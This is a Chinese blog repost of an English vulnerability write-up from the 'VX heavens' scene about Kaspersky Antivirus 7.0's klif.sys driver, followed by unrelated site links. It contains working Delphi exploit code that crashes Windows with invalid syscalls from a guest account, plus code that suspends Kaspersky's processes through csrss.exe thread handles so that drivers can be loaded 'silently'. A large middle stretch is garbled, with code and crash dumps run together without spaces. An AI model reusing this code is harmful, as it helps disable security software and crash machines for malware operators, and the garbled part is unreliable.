Haxdoors of the Kaspersky Antivirus 6/7

简介:
PS:全是英文,没看懂,有看懂的下面讲解一下。。。
axdoors of the Kaspersky Antivirus 6/7

================================
Preamble
================================

Kaspersky Antivirus one of the most technically modern antiviruses available today. It even can fight with several rootkit types, even when they are alive and kicking.

It features Proactive Defense module, a light HIPS implementation which should in theory protect computer from unknown threats by analyzing programs behavior and preventing programs from unauthorized actions.

This is the theory and promises of the screaming advertising. In real life we have absolutely different situation. There are exists many rootkits, which are completely undetectable by this antivirus, its proactive defense still can be bypassed and gives attacker ways to load driver, after this any proactive defense surrenders.

This article is not simple overview of bugs and vulnerabilities in the end of each part we are giving some recommendations to the Kaspersky Developers because as we see they can't handle their bugs itself. And oh yes, all listed below is not a critical vulnerabilities or bugs, no-no =). Just a few easy methods to get BSOD with KAV/KIS installed even from Guest account, just a method of KAV/KIS bypassing... etc, don't take it too close to the heart, guys ;)

Version of Kaspersky in this article - 7.0 latest public build 125, product type - Internet Security.


============================================
Kaspesky and System Service Descriptor Table
============================================

Very long time is known that this is the weakest part of this antivirus. The weakest, because it contains number of elementary bugs.

Another example of poorly coded so-called Proactive Defense. On Windows XP Kaspersky AV adds additional services in SSDT table. Count of services entries which are present only on Windows 2003. They starts from 284 and ends 296. About 13 unknown entries with addresses inside klif.sys.

Here they are:

ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BD80 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BD90 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BDA0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BDC0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BDE0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE10 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE20 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE40 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE50 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BF10 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BFE0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809C020 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809C060 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]

What is it? Fully unknown, but look like KAV developers do that to solve problem with different counts of entries for XP and 2003. Why it was done it is not our concern.

And now surprise. Any of this unknown SSDT entries can be EXPLOITED and can crash system into the BSOD even from Guest account with MINIMAL PRIVILEGES. We coded simple program. Its generates invalid system calls with invalid parameters for these unknown SSDT entries. The code is very simple but efficient. Using the same on clean Windows will lead to nothing, because Windows handles such situation in the right manner.


var
  Services: array[0..12] of ULONG;
  ThreadTerminated: boolean = false;
  ExecThread: THANDLE;

function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
asm
  mov eax, SysCallNumber
  mov edx, Stack
  int 2eh
  mov Result,eax
end;

function exec(p1: pointer): DWORD; stdcall;
var
  i: integer;
  p2: DWORD;
  p3: DWORD;
begin
  randomize();
  u := 0;
  for i := 0 to 12 do Services  := 284 + i;
  while not ThreadTerminated do
  begin
    p2 := random(FFFFFFFF);p3:=Services[random(12)];MakeSysCall(p3,@p2);Sleep(100);end;CloseHandle(ExecThread);ExecThread:=0;result:=0;end;varp2:DWORD;beginThreadTerminated:=false;ExecThread:=CreateThread(nil,0,@exec,nil,0,p2);end;Resultsofexecution:KasperskyInternetSecurityv7.0125buildPAGEFAULTINNONPAGEDAREA(50)Invalidsystemmemorywasreferenced.Thiscannotbeprotectedbytryexcept,itmustbeprotectedbyaProbe.Typicallytheaddressisjustplainbadoritispointingatfreedmemory.Arguments:Arg1:e0ae15f9,memoryreferenced.Arg2:00000000,value0=readoperation,1=writeoperation.Arg3:f8087e8c,Ifnonzero,theinstructionaddresswhichreferencedthebadmemoryaddress.Arg4:00000000,(reserved)DebuggingDetails:KernelsymbolsareWRONG.Pleasefixsymbolstodoanalysis.MODULENAME:klifFAULTINGMODULE:804d7000ntDEBUGFLRIMAGETIMESTAMP:468266cdREADADDRESS:unabletogetnt!MmSpecialPoolStartunabletogetnt!MmSpecialPoolEndunabletogetnt!MmPoolCodeStartunabletogetnt!MmPoolCodeEnde0ae15f9FAULTINGIP:klif+5e8cf8087e8c8b07moveax,dwordptr[edi]MMINTERNALCODE:0CUSTOMERCRASHCOUNT:1DEFAULTBUCKETID:WRONGSYMBOLSBUGCHECKSTR:0x50LASTCONTROLTRANSFER:from00442ea4tof8087e8cSTACKTEXT:WARNING:Stackunwindinformationnotavailable.Followingframesmaybewrong.f783fd6400442ea4badb0d0000ebffb000000000klif+0x5e8cf783fd68badb0d0000ebffb000000000000000000x442ea4f783fd6c00ebffb00000000000000000000000000xbadb0d00f783fd70000000000000000000000000000000000xebffb0STACKCOMMAND:kbFOLLOWUPIP:klif+5e8cf8087e8c8b07moveax,dwordptr[edi]SYMBOLSTACKINDEX:0FOLLOWUPNAME:MachineOwnerIMAGENAME:klif.sysSYMBOLNAME:klif+5e8cBUCKETID:WRONGSYMBOLSFollowup:MachineOwner=====================================But!Thisisnotall!InspiteofthepreviouslyreportvulnerabilitiesinSSDThandlersKLdevelopersSTILLnotfixedthem!WecanprovethatbysimpleprogramcalledNTCALL.Afterstartingitbeginsgenerationofinvalidsystemservicescalls.NtCreateSectioncallingthisfunctionwithwrongparametersWILLleadtoBSODwithklif.sysAndhereourBSOD!KERNELMODEEXCEPTIONNOTHANDLEDM(1000008e)Thisisaverycommonbugcheck.Usuallytheexceptionaddresspinpointsthedriver/functionthatcausedtheproblem.Alwaysnotethisaddressaswellasthelinkdateofthedriver/imagethatcontainsthisaddress.Somecommonproblemsareexceptioncode0x80000003.Thismeansahardcodedbreakpointorassertionwashit,butthissystemwasbooted/NODEBUG.Thisisnotsupposedtohappenasdevelopersshouldneverhavehardcodedbreakpointsinretailcode,but...Ifthishappens,makesureadebuggergetsconnected,andthesystemisbooted/DEBUG.Thiswillletusseewhythisbreakpointishappening.Arguments:Arg1:c0000005,TheexceptioncodethatwasnothandledArg2:805883ea,TheaddressthattheexceptionoccurredatArg3:f669a95c,TrapFrameArg4:00000000DebuggingDetails:ANALYSIS:Kernelwithunknownsize.Willforcereloadsymbolswithknownsize.ANALYSIS:Forcereloadcommand:.reload/fntoskrnl.exe=FFFFFFFF804D7000,214600,41108004KernelsymbolsareWRONG.Pleasefixsymbolstodoanalysis.MODULENAME:klifFAULTINGMODULE:804d7000ntDEBUGFLRIMAGETIMESTAMP:468266cdEXCEPTIONCODE:(NTSTATUS)0xc0000005FAULTINGIP:nt+b13ea805883ea8b88a4000000movecx,dwordptr[eax+0A4h]TRAPFRAME:f669a95c(.trap0xfffffffff669a95c)ErrCode=00000000eax=1ae9a770ebx=e1019546ecx=e1019552edx=55185990esi=5518598fedi=e1019552eip=805883eaesp=f669a9d0ebp=f669aad8iopl=0nvupeiplzrnapenccs=0008ss=0010ds=0023es=0023fs=0030gs=0000efl=00010246nt+0xb13ea:805883ea8b88a4000000movecx,dwordptr[eax+0A4h]ds:0023:1ae9a814=??ResettingdefaultscopeCUSTOMERCRASHCOUNT:1DEFAULTBUCKETID:WRONGSYMBOLSBUGCHECKSTR:0x8ELASTCONTROLTRANSFER:fromf9414603to805883eaSTACKTEXT:WARNING:Stackunwindinformationnotavailable.Followingframesmaybewrong.f669aad8f9414603e10195a8f669ab0c00000200nt+0xb13ea0000000000000000000000000000000000000000klif+0x16603STACKCOMMAND:kbFOLLOWUPIP:klif+16603f9414603??SYMBOLSTACKINDEX:1FOLLOWUPNAME:MachineOwnerIMAGENAME:klif.sysSYMBOLNAME:klif+16603BUCKETID:WRONGSYMBOLSFollowup:MachineOwnerSo,whatwecansayhere?ItistimetostopusingperversionswithSSDTandtimetowritenormalhandlersforSSDTentries.YoubetteraskZaytsevOleg,heknowshowtosetuphooksinSSDT;)=========================KasperskyandShadowSSDT=========================ShadowSSDTisaspecialtableintowin32k.syswhichcontainsaddressesofthesystemroutinesrelatedtoGDI/USER.Kasperskyhooksseveralserviceshereforantikeyloggerfeatureandselfprotection.AndagainhookedBADLY.NtUserSendInputwithwrongparametersand...>haha,anotherBSOD,doesntitrememberssomekindofBSODgenerator?=)PAGEFAULTINNONPAGEDAREA(50)Invalidsystemmemorywasreferenced.Thiscannotbeprotectedbytryexcept,itmustbeprotectedbyaProbe.Typicallytheaddressisjustplainbadoritispointingatfreedmemory.Arguments:Arg1:e1f83004,memoryreferenced.Arg2:00000000,value0=readoperation,1=writeoperation.Arg3:f9417eee,Ifnonzero,theinstructionaddresswhichreferencedthebadmemoryaddress.Arg4:00000001,(reserved)DebuggingDetails:ANALYSIS:Kernelwithunknownsize.Willforcereloadsymbolswithknownsize.ANALYSIS:Forcereloadcommand:.reload/fntoskrnl.exe=FFFFFFFF804D7000,214600,41108004KernelsymbolsareWRONG.Pleasefixsymbolstodoanalysis.MODULENAME:klifFAULTINGMODULE:804d7000ntDEBUGFLRIMAGETIMESTAMP:468266cdREADADDRESS:unabletogetnt!MmSpecialPoolStartunabletogetnt!MmSpecialPoolEndunabletogetnt!MmPoolCodeStartunabletogetnt!MmPoolCodeEnde1f83004FAULTINGIP:klif+19eeef9417eee8b4500moveax,dwordptr[ebp]MMINTERNALCODE:1CUSTOMERCRASHCOUNT:1DEFAULTBUCKETID:WRONGSYMBOLSBUGCHECKSTR:0x50LASTCONTROLTRANSFER:from80000014tof9417eeeSTACKTEXT:WARNING:Stackunwindinformationnotavailable.Followingframesmaybewrong.f605285080000014e1f6a00800010013f9418090klif+0x19eeef6052854e1f6a00800010013f9418090000000000x80000014f605285800010013f941809000000000f94180bc0xe1f6a008f605285cf941809000000000f94180bce1f6a0080x10013f605286000000000f94180bce1f6a00880000014klif+0x1a090STACKCOMMAND:kbFOLLOWUPIP:klif+19eeef9417eee8b4500moveax,dwordptr[ebp]SYMBOLSTACKINDEX:0FOLLOWUPNAME:MachineOwnerIMAGENAME:klif.sysSYMBOLNAME:klif+19eeeBUCKETID:WRONGSYMBOLSFollowup:MachineOwnerForthispartrecommendationswillbesimpleputyourdriverintodebugger.====================================KasperskyandImportAddressesTable====================================Thefollowingcodevarp1:PChar;beginp1:=PChar(ffffffff);
  LoadLibraryA(p1);
end;


will lead to the Access Violation. That is normal, because we used invalid parameter for the function, but abnormal thing here is WHERE this access violation occurs, the address - 0xF80B3306.
This is not a joke - 0xF80B3306! In kernel mode!
To be more correct inside klif.sys

Lets look whats happening.

We found massive IAT modifcation found for each process in the system. Look whats happened with explorer.exe

[420]explorer.exe-->kernel32.dll-->LoadLibraryExA, Type: IAT Modification at address 0x010010A8-->7C882FB0 hook handler located in [kernel32.dll]
[420]explorer.exe-->kernel32.dll-->LoadLibraryExW, Type: IAT Modification at address 0x010010F8-->7C882FD8 hook handler located in [kernel32.dll]
[420]explorer.exe-->kernel32.dll-->LoadLibraryA, Type: IAT Modification at address 0x01001150-->7C882F9C hook handler located in [kernel32.dll]
[420]explorer.exe-->kernel32.dll-->LoadLibraryW, Type: IAT Modification at address 0x010011D0-->7C882FC4 hook handler located in [kernel32.dll]
[420]explorer.exe-->kernel32.dll-->GetProcAddress, Type: IAT Modification at address 0x010011E4-->7C882FEC hook handler located in [kernel32.dll]

Strange isn't? Lets trace LoadLibraryA call.

KERNEL32.LoadLibraryA:


push ebp
mov ebp, esp
nop
pop ebp
jmp +$7b830b4a <-call gate to klif.sys
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop


Thats how looks LoadLibraryA inside kernel32.dll after IAT redirection by Kaspersky Antivirus. Isn't a perversion?

If you installs this antivirus on your PC you are (what a irony) opening it for additional exploits / backdoors, created with help of this antivirus, LOL.

For this part we are recommending Kaspersky developers remove this perversion from their product. Exists better and simpler ways to communicate with kernel mode part and in the end - this is a simple perversion.

================================
Kaspersky Antivirus Self-Defense
================================

As most of you knows, Kaspersky Antivirus activelly defend itself against malware attacks. Its processes are protected from unauthorized access and termination by malware. But how good they are protected?

BAD.

Kaspersky Antivirus set up several hooks in SSDT (e.g. NtOpenProcess, NtOpenThread, NtTerminateProcess etc), several hooks in Shadow SSDT (e.g. NtUserFindWindowEx, NtUserBuildHwndList etc) additionally to protect itself from malware attacks.

Additionally it set ups itself as service with restart on errors settings. Service configuration in registry protected from access by several hooks in the SSDT. So how we can kill this AV? And do we need to kill it? If we will kill avp.exe GUI part then it will be restarted by service. If we kill service, then it will be restarted by SCM. So, how we can destroy this antivirus (in educational purposes, of course)? That's a good question. The answer is very simple. We should leave it alive, but make it totally unworkable. One thing that we need - load driver, after it we will be completely out of Kaspersky Antivirus interests. But previous we have to lock it, to give us this ability, yeah? Not exactly. There are exists at least three methods which can do the silent driver loading without any notice from Kaspersky Proactive Defense 7.0 I'm sure that exists and some other methods. In our case we must suspend all threads of Kaspersky processes, simple suspend, nothing more, that will be enough. We can't access threads of the Kaspersky processes directly, because SSDT is owned by PDM. So it is time to use our loved backdoor process called csrss.exe 

In this example we a priori takes that KAV executables named avp.exe and csrss.exe exists in one instance (LOL, if you have ring3 malware masking as csrss.exe, here could be a little problem).


var
  AVPID: array[0..9] of ULONG;
  last: integer;
  h2: THANDLE;
  ph: THANDLE;
  bytesIO: ULONG;
  buf: PSYSINFOBUF;
  i, c: integer;
  cid1: CLIENT_ID;
  attr: OBJECT_ATTRIBUTES;
  csrss_id: THANDLE;
  tmp1: LBuf;
  pBuffer: PROCESSENTRY32W;
  SnapShotHandle: THANDLE;
  tbi: THREAD_BASIC_INFORMATION;
  exists: boolean;
begin
  RTL.EnableSystemPrivilege('SeDebugPrivilege', true);
  last := 0;
  pBuffer.dwSize := sizeof(PROCESSENTRY32W);
  SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  if (SnapShotHandle <> INVALID_HANDLE_VALUE) then
    if Process32FirstW(SnapShotHandle, @pBuffer) then
      repeat
        if (pBuffer.szExeFile = 'avp.exe') then
        begin
          for i := 0 to 9 do
            exists := (AVPID = pBuffer.th32ProcessID);
          if not exists then
          begin
            AVPID[last] := pBuffer.th32ProcessID;
            inc(last);
          end;
        end;
      until (not Process32NextW(SnapShotHandle, @pBuffer));
  CloseHandle(SnapShotHandle);
  csrss_id := 0;
  pBuffer.dwSize := sizeof(PROCESSENTRY32W);
  SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  if (SnapShotHandle <> INVALID_HANDLE_VALUE) then
    if Process32FirstW(SnapShotHandle, @pBuffer) then
      repeat
        ExtractFileNameW(pBuffer.szExeFile, tmp1);
        if (strcmpiW(tmp1, 'csrss.exe') = 0) then
        begin
          csrss_id := pBuffer.th32ProcessID;
          break;
        end;
      until (not Process32NextW(SnapShotHandle, @pBuffer));
  CloseHandle(SnapShotHandle);
  if (csrss_id = 0) then exit;

  attr.Length := sizeof(OBJECT_ATTRIBUTES);
  attr.RootDirectory := 0;
  attr.ObjectName := nil;
  attr.Attributes := 0;
  attr.SecurityDescriptor := nil;
  attr.SecurityQualityOfService := nil;

  cid1.UniqueProcess := csrss_id;
  cid1.UniqueThread := 0;
  if (ZwOpenProcess(@ph, PROCESS_ALL_ACCESS, @attr, @cid1) <> STATUS_SUCCESS) then exit;
  bytesIO := 4194304;
  buf := nil;
  ZwAllocateVirtualMemory(GetCurrentProcess(), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
  ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO);
  for c := 0 to buf^.uHandleCount - 1 do
    if (buf^.rHandleTable[c].ProcessId = csrss_id) then
    begin
      if (buf^.rHandleTable[c].ObjectTypeNumber = PsThreadType) then
      begin
        h2 := 0;
        if (ZwDuplicateObject(ph, buf^.rHandleTable[c].Handle, DWORD(-1), @h2,
          0, 0, DUPLICATE_SAME_ACCESS) = STATUS_SUCCESS) then
        begin
          ZwQueryInformationThread(h2, ThreadBasicInformation, @tbi, sizeof(tbi), @bytesIO);
          for i := 0 to last do
            if (tbi.ClientId.UniqueProcess = AVPID) then ZwSuspendThread(h2, nil);
        end;
      end;
    end;
  ZwClose(ph);
  bytesIO := 0;
  ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE);
end;


After this both executables of Kaspersky will be suspended and we can load drivers and do our job silently =)

Tested on KIS v7.0 build 125 with Default AV settings applied.
Windows XP SP2, admin rights.

We recommend KL walk into HANDLE_TABLE and change access rights for their Thread handles. Additionally it is time to improve filter for NtDuplicateObject hook.

================================
Epilog
================================

You might be asking yourself, why so OBVIOUS BUGS / natural DoS haxdoors still EXISTS in the one of the most popular antiviruses? Because somebody should do kick in the ass of KL. Not so long time ago we have published another overview of KAV bugs - "Exploiting Kaspersky Antivirus 6.0/7.0" The reaction on this article was expected. They said something like this - "No worry, this is not a critical bugs". Yes, probably Blue Screen Of Death from GUEST account is not a very big problem for this company. "Really, wtf is BSOD? Nothing, relax guys" But something is changing, they closed several published vulnerabilities, so they must say a little "thank you" to us. Instead of this we have got a lot of **** in our addresses (of course unofficially). Well, we simple don't care about such reactions, so don't bother yourself guys/fanatics. We do not want our self advertisment and we do not want watch so stupid BSOD's from KAV.

Dear Kaspersky Lab developers, your antivirus is pretty good, it is not disputable fact, but maybe it is time for you - fix these bugs? Remove your perversions in SSDT/IAT hooking. Add more exception handling in your driver. Seriously what is wrong? Looking on klif.sys I see only one thing -> BIG, BUGGY driver.

Some kind of unofficial reaction from the Kaspersky Lab on our previous overview of klif.sys vulnerabilities you can read from this wonderful article, which contains several absurd statements and nonsense commentaries. In few words, author of this article has partly accused us for publication information about vulnerabilities in the their old/new products.

[url]http://www.viruslist.ru/analysis?pubid=204007553[/url]

It is in Russian, but I'm sure you can find English variant.

Have a fun,
from the VX heavens

EP_X0FF/UG North

















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/42390 ,如需转载请自行联系原作者



目录
打赏
0
0
0
0
143
分享
相关文章
export GOMP_CPU_AFFINITY=0-(((npro
export GOMP_CPU_AFFINITY=0-(((nproc --all) - 1 )) 是一条 Linux 命令,用于设置 GOMP(Go 语言的 OpenMP 支持库)使用的 CPU 亲和性。
491 1
React 表单输入组件 Input:常见问题、易错点及解决方案
本文介绍了在 React 中使用表单输入组件 `Input` 的基础概念,包括受控组件与非受控组件的区别及其优势。通过具体代码案例,详细探讨了创建受控组件、处理多个输入字段、输入验证和格式化的方法,并指出了常见易错点及避免方法,旨在提升表单的健壮性和用户体验。
165 4
链动2+1模式开发规则分析:独特机制实现快速裂变
链动2+1模式是一种基于私域或社交电商的商业模式,通过“分享+邀请”机制设定代理和老板两种身份,结合直推奖、见点奖等多种奖励,促进用户裂变,快速扩大用户规模,同时确保团队稳定和用户体验。该模式规则简单,易于理解,具有快速裂变拓客、低门槛高收益及合规性保障等优势。
物联网卡:物联网卡停机多久会被注销
物联网卡(IoT SIM卡)的停机与注销政策通常取决于具体的服务提供商(如电信运营商、物联网平台提供商等)以及用户与这些服务提供商之间签订的合同条款。因此,没有一个统一的、适用于所有情况的规则来规定物联网卡停机多久后会被注销。 然而,一般来说,物联网卡的停机与注销可能遵循以下一些常见的逻辑或规定:
大模型时代下,算法工程师该何去何从?
大模型时代的到来,将算法工程师的职业发展带入了全新的境地。在这个浩瀚的数据海洋中,算法工程师们面临着前所未有的挑战和机遇。不久前,合合信息举办了一场《》的直播活动,智能技术平台事业部副总经理、高级工程师丁凯博士分享了。这段深度探讨不仅让我对算法工程师的未来有了更清晰的认识,也启发了我对自身职业发展的思考。接下来,我将分享这次讨论的精彩内容,希望能够为同学们提供一些有益的启示与思考。
LRU算法与Caffeine、Redis中的缓存淘汰策略详解与比较
在实际应用中,我们需要考虑数据访问模式、内存限制以及性能需求等因素来选择最合适的缓存淘汰策略。通过深入了解LRU算法及其在不同缓存库中的应用,我们可以更好地优化我们的应用程序的性能。
630 1
阿里云oss存储简介
阿里云oss(对象存储服务)是阿里云提供的一种面向海量数据存储的解决方案。它是一种经济高效且具有高可扩展性的云存储服务,可用于存储和传输大规模的非结构化数据。阿里云oss存储以其高可用性、灵活性和安全性而备受用户的欢迎。
【微信小程序】收藏功能的实现(条件渲染、交互反馈)
wxml页面部分比较简单,添加一个view容器,命名为tool。然后添加三个小view,分别表示点赞、评论、收藏。每个小view中包括图片和数量,即image和text标签。每个功能按钮都绑定了对应的点击事件,即catchtap属性。除此之外,每个功能按钮绑定当前文章的id号。
什么是脏数据?怎样用箱形图分析异常值?终于有人讲明白了
导读:数据质量分析是数据挖掘中数据准备过程的重要一环,是数据预处理的前提,也是数据挖掘分析结论有效性和准确性的基础。没有可信的数据,数据挖掘构建的模型将是空中楼阁。
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等

登录插画

登录以查看您的控制台资源

管理云资源
状态一览
快捷访问